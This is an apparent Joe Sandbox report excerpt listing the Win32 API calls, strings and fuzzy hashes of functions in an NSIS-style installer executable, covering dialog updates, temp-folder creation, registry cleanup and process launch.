                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 722711167-2449383134
                                        • Opcode ID: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
                                        • Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
                                        • Opcode Fuzzy Hash: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
                                        • Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
                                        • GetMessagePos.USER32 ref: 00404E70
                                        • ScreenToClient.USER32(?,?), ref: 00404E8A
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                        • Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
                                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                        • Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5
                                        APIs
                                        • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                                        • GetLastError.KERNEL32 ref: 00405ACA
                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
                                        • GetLastError.KERNEL32 ref: 00405AE9
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99
                                        • C:\Users\user\Desktop, xrefs: 00405A73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                        • API String ID: 3449924974-2028306314
                                        • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                        • Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
                                        • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                        • Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                        • wsprintfW.USER32 ref: 00402F7D
                                        • SetWindowTextW.USER32(?,?), ref: 00402F8D
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402F9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                        • API String ID: 1451636040-1158693248
                                        • Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                                        • Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
                                        • Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                                        • Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                        • GlobalFree.KERNEL32(?), ref: 004029F0
                                        • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                                        • Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
                                        • Opcode Fuzzy Hash: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                                        • Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8
                                        APIs
                                        • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                                        • wsprintfW.USER32 ref: 00404DE9
                                        • SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s$H7B
                                        • API String ID: 3540041739-107966168
                                        • Opcode ID: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
                                        • Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
                                        • Opcode Fuzzy Hash: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
                                        • Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8
                                        APIs
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0
                                        • Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                                        • Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
                                        • Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                                        • Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401D9A
                                        • GetClientRect.USER32(?,?), ref: 00401DE5
                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                        • DeleteObject.GDI32(00000000), ref: 00401E39
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                                        • Instruction ID: def1b01f8fd4f78887aa18ea50614605241407c0d84dd339e733dcfbebc98a92
                                        • Opcode Fuzzy Hash: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                                        • Instruction Fuzzy Hash: 06212672A04119AFCB05CFA4DE45AEEBBB5EF08304F14403AF945F62A0C7389D51DB98
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E51
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
                                        • Instruction ID: a76e2873b7558907f835798c96529171b27b16ad4d601dd46fbfe91b59f2db27
                                        • Opcode Fuzzy Hash: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
                                        • Instruction Fuzzy Hash: F101D871900250EFEB005BB4EE89B9A3FB0AF15300F24893EF141B71E2C6B904459BED
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                                        • Instruction ID: 504b766b7349ebce22e5cc184c1b69e4e3709f4fc648736089561923f5a7a9d8
                                        • Opcode Fuzzy Hash: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                                        • Instruction Fuzzy Hash: C221AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CB98
                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E33
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3081826266
                                        • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                        • Instruction ID: be8ecf20d8ded769d30575e1df7d92fadfde1fb70814d4249ac81525444b4036
                                        • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                        • Instruction Fuzzy Hash: 4DD0A7311029347AC2117B489C08CDF62ACAE96300341043BF142B30A4C77C5E5287FD
                                        APIs
                                          • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                          • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405ECA
                                          • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                                          • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                                        • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405F72
                                        • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0), ref: 00405F82
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: P_B
                                        • API String ID: 3248276644-906794629
                                        • Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                                        • Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
                                        • Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                                        • Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00405547
                                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405598
                                          • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                                        • Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
                                        • Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                                        • Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59
                                        APIs
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422728,00000000,?,?,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,?,?,00406699,80000002), ref: 00406450
                                        • RegCloseKey.ADVAPI32(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000000,00422728), ref: 0040645B
                                        Strings
                                        • runas C:\Users\user\AppData\Local\Temp\setup_installer.exe, xrefs: 00406411
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 3356406503-1539586198
                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94
                                        APIs
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
                                        • CloseHandle.KERNEL32(?), ref: 00405B5B
                                        Strings
                                        • Error launching installer, xrefs: 00405B38
                                        Memory Dump Source
